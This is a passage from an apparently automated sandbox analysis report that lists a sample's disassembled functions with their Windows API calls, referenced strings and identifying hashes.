                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                          • String ID:
                                          • API String ID: 3840717409-0
                                          • Opcode ID: 857b4a86ddfbc29d52a41677affc0f8a11da33c9e26fbbbc90eb5157920523a3
                                          • Instruction ID: dfd7cd167d9131092d21947eb118ad0cf794975355ffcafeb04f07695f3f9afa
                                          • Opcode Fuzzy Hash: 857b4a86ddfbc29d52a41677affc0f8a11da33c9e26fbbbc90eb5157920523a3
                                          • Instruction Fuzzy Hash: DB413D79500205EFDB229F65DC4CEAE7BB8EF8A721F104058FA05E7660D7719D81DBA0
                                          Function 0013C854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3
                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0013C8A4
                                          • GetFocus.USER32 ref: 0013C8B4
                                          • GetDlgCtrlID.USER32(00000000), ref: 0013C8BF
                                          • _memset.LIBCMT ref: 0013C9EA
                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0013CA15
                                          • GetMenuItemCount.USER32(?), ref: 0013CA35
                                          • GetMenuItemID.USER32(?,00000000), ref: 0013CA48
                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0013CA7C
                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0013CAC4
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0013CAFC
                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0013CB31
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                          • String ID: 0
                                          • API String ID: 1296962147-4108050209
                                          • Opcode ID: f4bc3e1d911b58281d9e82dc9a938bdf1398ec20d1b06878844c7a42e5c74f16
                                          • Instruction ID: 9bfde6f6b23fed54e9d81d5bfe7ccc8900bdf62953fc1362352fc721b3fcaf75
                                          • Opcode Fuzzy Hash: f4bc3e1d911b58281d9e82dc9a938bdf1398ec20d1b06878844c7a42e5c74f16
                                          • Instruction Fuzzy Hash: BC817B75208305AFD715CF14C985EABBBE8FF88354F00492DFA99A72A1D730D945CBA2
                                          Function 00108ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00108E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00108E3C
                                            • Part of subcall function 00108E20: GetLastError.KERNEL32(?,00108900,?,?,?), ref: 00108E46
                                            • Part of subcall function 00108E20: GetProcessHeap.KERNEL32(00000008,?,?,00108900,?,?,?), ref: 00108E55
                                            • Part of subcall function 00108E20: HeapAlloc.KERNEL32(00000000,?,00108900,?,?,?), ref: 00108E5C
                                            • Part of subcall function 00108E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00108E73
                                            • Part of subcall function 00108EBD: GetProcessHeap.KERNEL32(00000008,00108916,00000000,00000000,?,00108916,?), ref: 00108EC9
                                            • Part of subcall function 00108EBD: HeapAlloc.KERNEL32(00000000,?,00108916,?), ref: 00108ED0
                                            • Part of subcall function 00108EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00108916,?), ref: 00108EE1
                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00108B2E
                                          • _memset.LIBCMT ref: 00108B43
                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00108B62
                                          • GetLengthSid.ADVAPI32(?), ref: 00108B73
                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00108BB0
                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00108BCC
                                          • GetLengthSid.ADVAPI32(?), ref: 00108BE9
                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00108BF8
                                          • HeapAlloc.KERNEL32(00000000), ref: 00108BFF
                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00108C20
                                          • CopySid.ADVAPI32(00000000), ref: 00108C27
                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00108C58
                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00108C7E
                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00108C92
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                          • String ID:
                                          • API String ID: 3996160137-0
                                          • Opcode ID: 935f683c06a0a17896dd3973591271c91b5cd59108c1157d2d291a7584c11a42
                                          • Instruction ID: fbb3d0118b015825da81d5abb87f128457632d79e4caf4054ac878e4f5804654
                                          • Opcode Fuzzy Hash: 935f683c06a0a17896dd3973591271c91b5cd59108c1157d2d291a7584c11a42
                                          • Instruction Fuzzy Hash: 58615A75904209AFDF11DF91DD44EEEBB79FF19300F048169FA95A72A0DBB19A00CB60
                                          Function 00127A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDC.USER32(00000000), ref: 00127A79
                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00127A85
                                          • CreateCompatibleDC.GDI32(?), ref: 00127A91
                                          • SelectObject.GDI32(00000000,?), ref: 00127A9E
                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00127AF2
                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00127B2E
                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00127B52
                                          • SelectObject.GDI32(00000006,?), ref: 00127B5A
                                          • DeleteObject.GDI32(?), ref: 00127B63
                                          • DeleteDC.GDI32(00000006), ref: 00127B6A
                                          • ReleaseDC.USER32(00000000,?), ref: 00127B75
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                          • String ID: (
                                          • API String ID: 2598888154-3887548279
                                          • Opcode ID: 6d46b6526c395eb6c85cc01d66d9ddbd3ed01e46d1ce4f599b426782d873f472
                                          • Instruction ID: 13e611234c48bf7b59ea2d2ce04b5100d00a6894c709ffb3904aeaf5cb486140
                                          • Opcode Fuzzy Hash: 6d46b6526c395eb6c85cc01d66d9ddbd3ed01e46d1ce4f599b426782d873f472
                                          • Instruction Fuzzy Hash: 5A516B75904319EFCB15CFA9DC84EAFBBB9EF49310F14841DFA4AA7260D731A9508B60
                                          Function 0011A48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0011A4D4
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                          • LoadStringW.USER32(?,?,00000FFF,?), ref: 0011A4F6
                                          • __swprintf.LIBCMT ref: 0011A54F
                                          • __swprintf.LIBCMT ref: 0011A568
                                          • _wprintf.LIBCMT ref: 0011A61E
                                          • _wprintf.LIBCMT ref: 0011A63C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                          • API String ID: 311963372-2391861430
                                          • Opcode ID: 468840b1f678723c3a976508f74ed5f3cd336b47848d8a8a4e0dfde8b64b6515
                                          • Instruction ID: b74336f0abf9eac0dbbde1597d3d8d43594c1719cb09bfd336098fe0ccbc1b4d
                                          • Opcode Fuzzy Hash: 468840b1f678723c3a976508f74ed5f3cd336b47848d8a8a4e0dfde8b64b6515
                                          • Instruction Fuzzy Hash: 8D519F71801109AACF19EBE0CD86EEEB779AF19340F500169F505B21A3EB316F99CB61
                                          Function 00119710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0011951A: __time64.LIBCMT ref: 00119524
                                            • Part of subcall function 000C4A8C: _fseek.LIBCMT ref: 000C4AA4
                                          • __wsplitpath.LIBCMT ref: 001197EF
                                            • Part of subcall function 000D431E: __wsplitpath_helper.LIBCMT ref: 000D435E
                                          • _wcscpy.LIBCMT ref: 00119802
                                          • _wcscat.LIBCMT ref: 00119815
                                          • __wsplitpath.LIBCMT ref: 0011983A
                                          • _wcscat.LIBCMT ref: 00119850
                                          • _wcscat.LIBCMT ref: 00119863
                                            • Part of subcall function 00119560: _memmove.LIBCMT ref: 00119599
                                            • Part of subcall function 00119560: _memmove.LIBCMT ref: 001195A8
                                          • _wcscmp.LIBCMT ref: 001197AA
                                            • Part of subcall function 00119CF1: _wcscmp.LIBCMT ref: 00119DE1
                                            • Part of subcall function 00119CF1: _wcscmp.LIBCMT ref: 00119DF4
                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00119A0D
                                          • _wcsncpy.LIBCMT ref: 00119A80
                                          • DeleteFileW.KERNEL32(?,?), ref: 00119AB6
                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00119ACC
                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00119ADD
                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00119AEF
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                          • String ID:
                                          • API String ID: 1500180987-0
                                          • Opcode ID: 0ed5b2189b0fda6301d953d79ba066a28d8b667efb496eb856d08ade30c5e789
                                          • Instruction ID: 020244ddfee540bdd3db0f03bffdf0249f16b74cc6111bb928c8b78e5f6f7ed5
                                          • Opcode Fuzzy Hash: 0ed5b2189b0fda6301d953d79ba066a28d8b667efb496eb856d08ade30c5e789
                                          • Instruction Fuzzy Hash: FBC13BB1900228ABDF15DF95CC95EDEB7BDEF59300F0040AAF609E7251EB709A848F65
                                          Function 000C5BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 000C5BF1
                                          • GetMenuItemCount.USER32(00177890), ref: 00100E7B
                                          • GetMenuItemCount.USER32(00177890), ref: 00100F2B
                                          • GetCursorPos.USER32(?), ref: 00100F6F
                                          • SetForegroundWindow.USER32(00000000), ref: 00100F78
                                          • TrackPopupMenuEx.USER32(00177890,00000000,?,00000000,00000000,00000000), ref: 00100F8B
                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00100F97
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                          • String ID:
                                          • API String ID: 2751501086-0
                                          • Opcode ID: b025efb9a1eebceee1e941cfe917aa67ecff73e8b117073bec0e3f1bdf61d63d
                                          • Instruction ID: 9371ac9c07b6324d102084cd7904f4336f74e85cb1c487cba96866852e39c247
                                          • Opcode Fuzzy Hash: b025efb9a1eebceee1e941cfe917aa67ecff73e8b117073bec0e3f1bdf61d63d
                                          • Instruction Fuzzy Hash: 46711674644709BFEB228B55DC89FEEBF64FF08324F104216F6246A1E1C7B168A0DB90
                                          Function 001083FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B
                                          • _memset.LIBCMT ref: 00108489
                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001084BE
                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001084DA
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001084F6
                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00108520
                                          • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00108548
                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00108553
                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00108558
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                          • API String ID: 1411258926-22481851
                                          • Opcode ID: f61412322a802ae72ddcd329d62313f65e379330545ce07bf7ed8563d9101592
                                          • Instruction ID: d53c7d1f9cadd1ef57f13de3382b03dbce0656141c82c827fd566d2edb3f2f70
                                          • Opcode Fuzzy Hash: f61412322a802ae72ddcd329d62313f65e379330545ce07bf7ed8563d9101592
                                          • Instruction Fuzzy Hash: C941F576C1422DABCB11EBA4DC95EEDB778FF09340F044129F945A32A2EB709E14CB90
                                          Function 0013147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013040D,?,?), ref: 00131491
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                          • API String ID: 3964851224-909552448
                                          • Opcode ID: ad2cd366b047ad8fd4972f8ea794b0cc2353740fd1001a48a2696a1695affbb5
                                          • Instruction ID: 9ee2a2b3d23c8618bf3e1a6a2d126007c9df4a18d239e2f34dded2ae25daee3e
                                          • Opcode Fuzzy Hash: ad2cd366b047ad8fd4972f8ea794b0cc2353740fd1001a48a2696a1695affbb5
                                          • Instruction Fuzzy Hash: F941293450035AEBDF04EF90DD51AEA3725AF62304F604416FC9657292DB30ED2ACBA1
                                          Function 00115882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B
                                            • Part of subcall function 000C153B: _memmove.LIBCMT ref: 000C15C4
                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 001158EB
                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00115901
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00115912
                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00115924
                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00115935
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: SendString$_memmove
                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                          • API String ID: 2279737902-1007645807
                                          • Opcode ID: c7baf04bf3bed465fab48d95504c79235e5bb31e7c59694f72d49ec3e5d23c5a
                                          • Instruction ID: 8cb8f392da44d965fff10d969393a3c27832646d29f1976ca0167da3375b3d22
                                          • Opcode Fuzzy Hash: c7baf04bf3bed465fab48d95504c79235e5bb31e7c59694f72d49ec3e5d23c5a
                                          • Instruction Fuzzy Hash: 0A119031A4412DF9D724A7A1CC8AEFF7B7CFBD6B50F800429B811E21D2EB601994C5A1
                                          Function 00114C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                          • String ID: 0.0.0.0
                                          • API String ID: 208665112-3771769585
                                          • Opcode ID: 84f22127bf15454c79f1135254104eacfaf8cfb9d3cefe7090f907ca59a8644d
                                          • Instruction ID: 901fa6a0d0f0b77331c902e8dd15980a3211402187b44a780da44333268dba8c
                                          • Opcode Fuzzy Hash: 84f22127bf15454c79f1135254104eacfaf8cfb9d3cefe7090f907ca59a8644d
                                          • Instruction Fuzzy Hash: 37113A31904209ABCB19B7609D4AEDA77BCDF45B10F000176F544962A2EF7099C1CAB0
                                          Function 00115530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • timeGetTime.WINMM ref: 00115535
                                            • Part of subcall function 000D083E: timeGetTime.WINMM(?,00000002,000BC22C), ref: 000D0842
                                          • Sleep.KERNEL32(0000000A), ref: 00115561
                                          • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00115585
                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 001155A7
                                          • SetActiveWindow.USER32 ref: 001155C6
                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 001155D4
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 001155F3
                                          • Sleep.KERNEL32(000000FA), ref: 001155FE
                                          • IsWindow.USER32 ref: 0011560A
                                          • EndDialog.USER32(00000000), ref: 0011561B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                          • String ID: BUTTON
                                          • API String ID: 1194449130-3405671355
                                          • Opcode ID: 37962d6b43f8d497f334fdc9166bc2d2c8c91439365c304e1dd457cce7ce76de
                                          • Instruction ID: 50383b64441cd30fd2acb7b934a69d40f0b0f2f4300b5879c8308d561687fc0c
                                          • Opcode Fuzzy Hash: 37962d6b43f8d497f334fdc9166bc2d2c8c91439365c304e1dd457cce7ce76de
                                          • Instruction Fuzzy Hash: 6A21D478248604EFE7455B61EC88A653B7BEB89785F001038F509819B1EF718DD0DA71
                                          Function 0011DBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
                                            • Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC
                                          • CoInitialize.OLE32(00000000), ref: 0011DC2D
                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0011DCC0
                                          • SHGetDesktopFolder.SHELL32(?), ref: 0011DCD4
                                          • CoCreateInstance.OLE32(00143D4C,00000000,00000001,0016B86C,?), ref: 0011DD20
                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0011DD8F
                                          • CoTaskMemFree.OLE32(?,?), ref: 0011DDE7
                                          • _memset.LIBCMT ref: 0011DE24
                                          • SHBrowseForFolderW.SHELL32(?), ref: 0011DE60
                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0011DE83
                                          • CoTaskMemFree.OLE32(00000000), ref: 0011DE8A
                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0011DEC1
                                          • CoUninitialize.OLE32(00000001,00000000), ref: 0011DEC3
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                          • String ID:
